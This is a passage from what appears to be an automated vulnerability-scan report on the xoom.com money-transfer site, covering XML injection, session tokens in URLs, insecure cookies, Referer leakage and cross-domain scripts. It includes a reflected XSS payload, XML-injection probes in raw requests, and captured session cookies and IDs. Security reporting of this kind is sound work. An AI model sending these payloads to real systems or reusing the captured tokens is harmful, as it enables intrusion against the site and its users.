HTTP/1.1 200 OKC1706A5293EE8A0E70493B0; Path=/sendmoneynow.XoomAuthenticationProcessingFilter.USERNAME=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/sendmoneynow"; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/.SignedInRequestTimestampMarkerCookieGenerator.TIMESTAMP=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/df72027bdf0a46"/xhtml11/DTD/xhtml11.dtd">/1999/xhtml" xml:lang="en" lang="en">...[SNIP]... &passwordVerification=&contactInformation.email.value=&countryCode=US&first_name=&emailVerification=&token=2f5c1a54e134df4686142187005bbf233797a34f661246cb33a53"><script>alert(1)</script>f12273ea59423a079 &name=&contactInformation.firstName.value=&contactInformation.phone1.value=&signInTs=1320876654393&contactInformation.lastName.value=&languageCode=de" rel="de" title="Deutsch">...[SNIP]...
2. XML injection
previous
next
There are 3 instances of this issue:
Issue background
XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.
Issue remediation
The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: < and >.
2.1. https://www.xoom.com/siteContent/xoom-release-7.0.4/img/ocb/favicon.ico [REST URL parameter 2]
previous
next
Summary
Severity:
Medium
Confidence:
Tentative
Host:
https://www.xoom.com
Path:
/siteContent/xoom-release-7.0.4/img/ocb/favicon.ico
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /siteContent/xoom-release-7.0.4]]>> /img/ocb/favicon.ico HTTP/1.1/*;q=0.5;q=0.7=436274186.20480.0000; loc_1=en_US; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000
Response
HTTP/1.1 404 Not Foundxml version="1.0" encoding="iso-8859-1"?>/xhtml1/DTD/xhtml1-transitional.dtd">...[SNIP]...
2.2. https://www.xoom.com/siteContent/xoom-release-7.0.4/img/ocb/favicon.ico [REST URL parameter 3]
previous
next
Summary
Severity:
Medium
Confidence:
Tentative
Host:
https://www.xoom.com
Path:
/siteContent/xoom-release-7.0.4/img/ocb/favicon.ico
Issue detail
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /siteContent/xoom-release-7.0.4/img]]>> /ocb/favicon.ico HTTP/1.1/*;q=0.5;q=0.7=436274186.20480.0000; loc_1=en_US; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000
Response
HTTP/1.1 404 Not Foundxml version="1.0" encoding="iso-8859-1"?>/xhtml1/DTD/xhtml1-transitional.dtd">...[SNIP]...
2.3. https://www.xoom.com/siteContent/xoom-release-7.0.4/img/ocb/favicon.ico [REST URL parameter 4]
previous
next
Summary
Severity:
Medium
Confidence:
Tentative
Host:
https://www.xoom.com
Path:
/siteContent/xoom-release-7.0.4/img/ocb/favicon.ico
Issue detail
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.
Request
GET /siteContent/xoom-release-7.0.4/img/ocb]]>> /favicon.ico HTTP/1.1/*;q=0.5;q=0.7=436274186.20480.0000; loc_1=en_US; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000
Response
HTTP/1.1 404 Not Foundxml version="1.0" encoding="iso-8859-1"?>/xhtml1/DTD/xhtml1-transitional.dtd">...[SNIP]...
3. Session token in URL
previous
next
There are 4 instances of this issue:
Issue background
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.
3.1. https://www.xoom.com/sendmoneynow/fp/check.js
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://www.xoom.com
Path:
/sendmoneynow/fp/check.js
Issue detail
The URL in the request appears to contain a session token within the query string:https://www.xoom.com/sendmoneynow/fp/check.js?org_id=6b1ht7yc&session_id=85C71DA14E0C82F75AA33F8284E3C5E0
Request
GET /sendmoneynow/fp/check.js?org_id=6b1ht7yc&session_id=85C71DA14E0C82F75AA33F8284E3C5E0 HTTP/1.1;q=0.7/sendmoneynow/signUp?intcid=home2_____signupE0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876689|session#1320876608475-967538#1320878489; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_visit%3DNew%3B%20s_sq%3Dxoom-prod%253D%252526pid%25253Dhome.home%25252520-xoom%252526pidt%25253D1%252526oid%25253Dhttps%2525253A%2525252F%2525252Fwww.xoom.com%2525252Fsendmoneynow%2525252FsignUp%2525253Fintcid%2525253Dhome2_____signup%252526ot%25253DA%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878449571%3B%20s_nr%3D1320876649573-New%7C1323468649573%3B%20s_gpv_pn%3Dhome.home%2520-xoom%7C1320878449575%3B%20s_nr2%3D1320876649578-New%7C1478556649578%3B%20s_vs%3D1%7C1320878449585%3B
Response
HTTP/1.1 301 Moved Permanently.net/fp/check.js?org_id=6b1ht7yc&session_id=85C71DA14E0C82F75AA33F8284E3C5E0
3.2. https://www.xoom.com/sendmoneynow/fp/clear.png
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://www.xoom.com
Path:
/sendmoneynow/fp/clear.png
Issue detail
The URL in the request appears to contain a session token within the query string:https://www.xoom.com/sendmoneynow/fp/clear.png?org_id=6b1ht7yc&session_id=85C71DA14E0C82F75AA33F8284E3C5E0&m=2
Request
GET /sendmoneynow/fp/clear.png?org_id=6b1ht7yc&session_id=85C71DA14E0C82F75AA33F8284E3C5E0 &m=2 HTTP/1.1/*;q=0.5;q=0.7/sendmoneynow/signUp?intcid=home2_____signupE0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876689|session#1320876608475-967538#1320878489; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_visit%3DNew%3B%20s_sq%3Dxoom-prod%253D%252526pid%25253Dhome.home%25252520-xoom%252526pidt%25253D1%252526oid%25253Dhttps%2525253A%2525252F%2525252Fwww.xoom.com%2525252Fsendmoneynow%2525252FsignUp%2525253Fintcid%2525253Dhome2_____signup%252526ot%25253DA%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878449571%3B%20s_nr%3D1320876649573-New%7C1323468649573%3B%20s_gpv_pn%3Dhome.home%2520-xoom%7C1320878449575%3B%20s_nr2%3D1320876649578-New%7C1478556649578%3B%20s_vs%3D1%7C1320878449585%3B
Response
HTTP/1.1 301 Moved Permanently.net/fp/clear.png?org_id=6b1ht7yc&session_id=85C71DA14E0C82F75AA33F8284E3C5E0&m=2
3.3. https://www.xoom.com/sendmoneynow/fp/fp.swf
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://www.xoom.com
Path:
/sendmoneynow/fp/fp.swf
Issue detail
The URL in the request appears to contain a session token within the query string:https://www.xoom.com/sendmoneynow/fp/fp.swf?org_id=6b1ht7yc&session_id=85C71DA14E0C82F75AA33F8284E3C5E0
Request
GET /sendmoneynow/fp/fp.swf?org_id=6b1ht7yc&session_id=85C71DA14E0C82F75AA33F8284E3C5E0 HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7/sendmoneynow/signUp?intcid=home2_____signupE0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876712|session#1320876608475-967538#1320878512; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_visit%3DNew%3B%20s_sq%3Dxoom-prod%253D%252526pid%25253Dhome.home%25252520-xoom%252526pidt%25253D1%252526oid%25253Dhttps%2525253A%2525252F%2525252Fwww.xoom.com%2525252Fsendmoneynow%2525252FsignUp%2525253Fintcid%2525253Dhome2_____signup%252526ot%25253DA%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878449571%3B%20s_nr%3D1320876649573-New%7C1323468649573%3B%20s_gpv_pn%3Dhome.home%2520-xoom%7C1320878449575%3B%20s_nr2%3D1320876649578-New%7C1478556649578%3B%20s_vs%3D1%7C1320878449585%3B
Response
HTTP/1.1 301 Moved Permanently.net/fp/fp.swf?org_id=6b1ht7yc&session_id=85C71DA14E0C82F75AA33F8284E3C5E0-flash
3.4. https://www.xoom.com/sendmoneynow/signUp
previous
next
Summary
Severity:
Medium
Confidence:
Firm
Host:
https://www.xoom.com
Path:
/sendmoneynow/signUp
Issue detail
The response contains the following links that appear to contain session tokens:https://www.xoom.com/sendmoneynow/fp/check.js?org_id=6b1ht7yc&session_id=85C71DA14E0C82F75AA33F8284E3C5E0 https://www.xoom.com/sendmoneynow/fp/clear.png?org_id=6b1ht7yc&session_id=85C71DA14E0C82F75AA33F8284E3C5E0&m=2 https://www.xoom.com/sendmoneynow/fp/fp.swf?org_id=6b1ht7yc&session_id=85C71DA14E0C82F75AA33F8284E3C5E0
Request
GET /sendmoneynow/signUp?intcid=home2_____signup HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7/sendmoneynow/homeE0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876689|session#1320876608475-967538#1320878489; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_visit%3DNew%3B%20s_sq%3Dxoom-prod%253D%252526pid%25253Dhome.home%25252520-xoom%252526pidt%25253D1%252526oid%25253Dhttps%2525253A%2525252F%2525252Fwww.xoom.com%2525252Fsendmoneynow%2525252FsignUp%2525253Fintcid%2525253Dhome2_____signup%252526ot%25253DA%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878449571%3B%20s_nr%3D1320876649573-New%7C1323468649573%3B%20s_gpv_pn%3Dhome.home%2520-xoom%7C1320878449575%3B%20s_nr2%3D1320876649578-New%7C1478556649578%3B%20s_vs%3D1%7C1320878449585%3B
Response
HTTP/1.1 200 OK475ea664b095e2"/xhtml11/DTD/xhtml11.dtd">/1999/xhtml" xml:lang="en" lang="en">...[SNIP]... <img src="/sendmoneynow/fp/clear.png?org_id=6b1ht7yc&session_id=85C71DA14E0C82F75AA33F8284E3C5E0&m=2" alt="" /> <script src="/sendmoneynow/fp/check.js?org_id=6b1ht7yc&session_id=85C71DA14E0C82F75AA33F8284E3C5E0" type="text/javascript"> </script><object type="application/x-shockwave-flash" data="/sendmoneynow/fp/fp.swf?org_id=6b1ht7yc&session_id=85C71DA14E0C82F75AA33F8284E3C5E0" width="1" height="1" id="obj_id"> /fp.swf?org_id=6b1ht7yc&session_id=85C71DA14E0C82F75AA33F8284E3C5E0"/>...[SNIP]...
4. SSL cookie without secure flag set
previous
next
There are 6 instances of this issue:
Issue background
If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.
Issue remediation
The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.
4.1. https://www.xoom.com/sendmoneynow/home
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/home
Issue detail
The following cookie was issued by the application and does not have the secure flag set:loc_1=en_US; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:24:17 GMT; Path=/
Request
GET /sendmoneynow/home HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7=436274186.20480.0000
Response
HTTP/1.1 200 OKSet-Cookie: loc_1=en_US; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:24:17 GMT; Path=/ ece2db8babf40e"/xhtml11/DTD/xhtml11.dtd">/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml:la...[SNIP]...
4.2. https://www.xoom.com/siteContent/xoom-release-7.0.4/css/ocb/page/home2.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/siteContent/xoom-release-7.0.4/css/ocb/page/home2.css
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerprod-http-sitecontent=436274186.20992.0000; path=/
Request
GET /siteContent/xoom-release-7.0.4/css/ocb/page/home2.css HTTP/1.1;q=0.7/sendmoneynow/home=436274186.20480.0000; loc_1=en_US; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000
Response
HTTP/1.1 200 OKSet-Cookie: BIGipServerprod-http-sitecontent=436274186.20992.0000; path=/ /../img/ocb/home2/body-background.png) 0 0 repeat-x;}.newlayout{margin:0 auto;width:960px;}a{color:#17338F;text-decoration:none;}.xoom-header{background:none;padding-bottom:22...[SNIP]...
4.3. https://www.xoom.com/siteContent/xoom-release-7.0.4/css/ocb/xoom-core.css
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/siteContent/xoom-release-7.0.4/css/ocb/xoom-core.css
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerprod-http-sitecontent=436274186.20992.0000; path=/
Request
GET /siteContent/xoom-release-7.0.4/css/ocb/xoom-core.css HTTP/1.1;q=0.7/sendmoneynow/home=436274186.20480.0000; loc_1=en_US; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000
Response
HTTP/1.1 200 OKSet-Cookie: BIGipServerprod-http-sitecontent=436274186.20992.0000; path=/ ,sans-serif;color:#000;background:#FFF;padding:0;margin:0;}body,div,dl,dt,dd,h1,h2,h3,h4,h5,h6,pre,code,form,fieldset,legend,input,textarea,p,blockquote,th,td{...[SNIP]...
4.4. https://www.xoom.com/siteContent/xoom-release-7.0.4/img/ocb/logo247.png
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/siteContent/xoom-release-7.0.4/img/ocb/logo247.png
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerprod-http-sitecontent=436274186.20992.0000; path=/
Request
GET /siteContent/xoom-release-7.0.4/img/ocb/logo247.png HTTP/1.1/*;q=0.5;q=0.7/sendmoneynow/home=436274186.20480.0000; loc_1=en_US; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000
Response
HTTP/1.1 200 OKSet-Cookie: BIGipServerprod-http-sitecontent=436274186.20992.0000; path=/ .tEXtSoftware.Adobe ImageReadyq.e<...0PLTE.3.E.#......d.H........l...............au.CZ....",tF....tRNS.................#].....IDATx..Z... ..........N....VJ&..L.]\,...[SNIP]...
4.5. https://www.xoom.com/siteContent/xoom-release-7.0.4/js/xoom-core.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/siteContent/xoom-release-7.0.4/js/xoom-core.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerprod-http-sitecontent=436274186.20992.0000; path=/
Request
GET /siteContent/xoom-release-7.0.4/js/xoom-core.js HTTP/1.1;q=0.7/sendmoneynow/home=436274186.20480.0000; loc_1=en_US; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000
Response
HTTP/1.1 200 OKSet-Cookie: BIGipServerprod-http-sitecontent=436274186.20992.0000; path=/ {metadata:{defaults:{type:"class",name:"metadata",cre:/({.*})/,single:"metadata"},setType:function(type,name){this.defaults.type=type;this.defaults.name=name},get:function(elem,o...[SNIP]...
4.6. https://www.xoom.com/siteContent/xoom-release-7.0.4/js/xoom-init.js
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/siteContent/xoom-release-7.0.4/js/xoom-init.js
Issue detail
The following cookie was issued by the application and does not have the secure flag set:BIGipServerprod-http-sitecontent=436274186.20992.0000; path=/
Request
GET /siteContent/xoom-release-7.0.4/js/xoom-init.js HTTP/1.1;q=0.7/sendmoneynow/home=436274186.20480.0000; loc_1=en_US; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000
Response
HTTP/1.1 200 OKSet-Cookie: BIGipServerprod-http-sitecontent=436274186.20992.0000; path=/ ...[SNIP]...
5. Cookie scoped to parent domain
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/home
Issue detail
The following cookie was issued by the application and is scoped to a parent of the issuing domain:loc_1=en_US; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:24:17 GMT; Path=/
Issue background
A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.
Issue remediation
By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.
Request
GET /sendmoneynow/home HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7=436274186.20480.0000
Response
HTTP/1.1 200 OKSet-Cookie: loc_1=en_US; Domain=.xoom.com; Expires=Tue, 28-Nov-2079 01:24:17 GMT; Path=/ ece2db8babf40e"/xhtml11/DTD/xhtml11.dtd">/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xml:la...[SNIP]...
6. Cross-domain Referer leakage
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/signUp
Issue detail
The page was loaded from a URL containing a query string:https://www.xoom.com/sendmoneynow/signUp?intcid=home2_____signup https://altfarm.mediaplex.com/ad/bn/4770-113961-1193-0?mpt=62e07b9e777846a784d9ceb11d5ca18b&co=1&lg=en&cb=XOOM https://clicktoverify.truste.com/pvr.php?page=validate&url=www.xoom.com&lang=en&sealid=101 https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=WWW.XOOM.COM&lang=en https://www.bbb.org/online/consumer/cks.aspx?ID=10312298372137787 https://www.sc.pages05.net/lp/static/js/iMAWebCookie.js?6504a503-12dc860ffe2-37c504b367ce64f028215bda5330c1de&h=www.pages05.net
Issue background
When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.
Issue remediation
The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.
Request
GET /sendmoneynow/signUp?intcid=home2_____signup HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7/sendmoneynow/homeE0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876689|session#1320876608475-967538#1320878489; s_sess=%20s_cpc%3D0%3B%20s_cc%3Dtrue%3B%20s_gvo_visit%3DNew%3B%20s_sq%3Dxoom-prod%253D%252526pid%25253Dhome.home%25252520-xoom%252526pidt%25253D1%252526oid%25253Dhttps%2525253A%2525252F%2525252Fwww.xoom.com%2525252Fsendmoneynow%2525252FsignUp%2525253Fintcid%2525253Dhome2_____signup%252526ot%25253DA%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878449571%3B%20s_nr%3D1320876649573-New%7C1323468649573%3B%20s_gpv_pn%3Dhome.home%2520-xoom%7C1320878449575%3B%20s_nr2%3D1320876649578-New%7C1478556649578%3B%20s_vs%3D1%7C1320878449585%3B
Response
HTTP/1.1 200 OK475ea664b095e2"/xhtml11/DTD/xhtml11.dtd">/1999/xhtml" xml:lang="en" lang="en">...[SNIP]... -promo"><img src="https://altfarm.mediaplex.com/ad/bn/4770-113961-1193-0?mpt=62e07b9e777846a784d9ceb11d5ca18b&co=1&lg=en&cb=XOOM" alt="" class="media-plex-placement"/> </div>...[SNIP]... <a href="https://seal.verisign.com/splash?form_file=fdf/splash.fdf&dn=WWW.XOOM.COM&lang=en" rel="external" class="trust-icon icon-verisign"> ...[SNIP]... <a href="https://www.bbb.org/online/consumer/cks.aspx?ID=10312298372137787" rel="external" class="trust-icon icon-bbb"> ...[SNIP]... <a href="https://clicktoverify.truste.com/pvr.php?page=validate&url=www.xoom.com&lang=en&sealid=101" rel="external" class="trust-icon icon-truste"> ...[SNIP]... <script src="https://www.sc.pages05.net/lp/static/js/iMAWebCookie.js?6504a503-12dc860ffe2-37c504b367ce64f028215bda5330c1de&h=www.pages05.net" type="text/javascript"> </script>...[SNIP]...
7. Cross-domain script include
previous
next
There are 4 instances of this issue:
Issue background
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
7.1. https://www.xoom.com/sendmoneynow/help/help-center
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/help/help-center
Issue detail
The response dynamically includes the following scripts from other domains:https://www.google.com/jsapi https://www.sc.pages05.net/lp/static/js/iMAWebCookie.js?6504a503-12dc860ffe2-37c504b367ce64f028215bda5330c1de&h=www.pages05.net
Request
GET /sendmoneynow/help/help-center HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7/sendmoneynow/homeE0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en_US; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876669|session#1320876608475-967538#1320878469; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D1%3B%20s_sq%3D%3B%20s_gvo_visit%3DNew%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878418506%3B%20s_nr%3D1320876618510-New%7C1323468618510%3B%20s_gpv_pn%3Dhome.home%2520-xoom%7C1320878418513%3B%20s_nr2%3D1320876618519-New%7C1478556618519%3B%20s_vs%3D1%7C1320878418527%3B
Response
HTTP/1.1 200 OK50ec3ad7a86d68"/xhtml11/DTD/xhtml11.dtd">/1999/xhtml" xml:lang="en" lang="en">...[SNIP]... <script src="//www.google.com/jsapi" type="text/javascript"> </script>...[SNIP]... <script src="https://www.sc.pages05.net/lp/static/js/iMAWebCookie.js?6504a503-12dc860ffe2-37c504b367ce64f028215bda5330c1de&h=www.pages05.net" type="text/javascript"> </script>...[SNIP]...
7.2. https://www.xoom.com/sendmoneynow/help/how-do-i-pay-for-a-xoom-transaction
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/help/how-do-i-pay-for-a-xoom-transaction
Issue detail
The response dynamically includes the following scripts from other domains:https://www.google.com/jsapi https://www.sc.pages05.net/lp/static/js/iMAWebCookie.js?6504a503-12dc860ffe2-37c504b367ce64f028215bda5330c1de&h=www.pages05.net
Request
GET /sendmoneynow/help/how-do-i-pay-for-a-xoom-transaction HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7/sendmoneynow/help/help-centerE0C82F75AA33F8284E3C5E0; BIGipServerprod-http-xoom=436274186.20480.0000; loc_1=en; mgaff_1=untracked; referringUrl_1=""; FP_1=15927987e2cf91f6625087843d160c9c; AB_1=2795231653462084052; recLoc_1=en; BIGipServerprod-http-prexoom=436274186.36895.0000; BIGipServerprod-http-sitecontent=436274186.20992.0000; mbox=check#true#1320876686|session#1320876608475-967538#1320878486; s_sess=%20s_cc%3Dtrue%3B%20s_cpc%3D0%3B%20s_gvo_visit%3DNew%3B%20s_sq%3Dxoom-prod%253D%252526pid%25253Dhelp.Help%25252520Home%25252520-%25252520-xoom%252526pidt%25253D1%252526oid%25253Dhttps%2525253A%2525252F%2525252Fwww.xoom.com%2525252Fsendmoneynow%2525252Fhelp%2525252Fhow-do-i-pay-for-a-xoom-transaction%252526ot%25253DA%3B; s_pers=%20s_vnum%3D1322719200658%2526vn%253D1%7C1322719200658%3B%20s_lastvisit%3D1320876608663%7C1415484608663%3B%20s_invisit%3Dtrue%7C1320878428474%3B%20s_nr%3D1320876628475-New%7C1323468628475%3B%20s_gpv_pn%3Dhelp.Help%2520Home%2520-%2520-xoom%7C1320878428476%3B%20s_nr2%3D1320876628477-New%7C1478556628477%3B%20s_vs%3D1%7C1320878428479%3B
Response
HTTP/1.1 200 OK2fed0286078eb8"/xhtml11/DTD/xhtml11.dtd">/1999/xhtml" xml:lang="en" lang="en">...[SNIP]... <script src="//www.google.com/jsapi" type="text/javascript"> </script>...[SNIP]... <script src="https://www.sc.pages05.net/lp/static/js/iMAWebCookie.js?6504a503-12dc860ffe2-37c504b367ce64f028215bda5330c1de&h=www.pages05.net" type="text/javascript"> </script>...[SNIP]...
7.3. https://www.xoom.com/sendmoneynow/home
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
https://www.xoom.com
Path:
/sendmoneynow/home
Issue detail
The response dynamically includes the following script from another domain:https://www.googleadservices.com/pagead/conversion.js
Request
GET /sendmoneynow/home HTTP/1.1/xhtml+xml,application/xml;q=0.9,*/*;q=0.8;q=0.7=436274186.20480.0000
Response
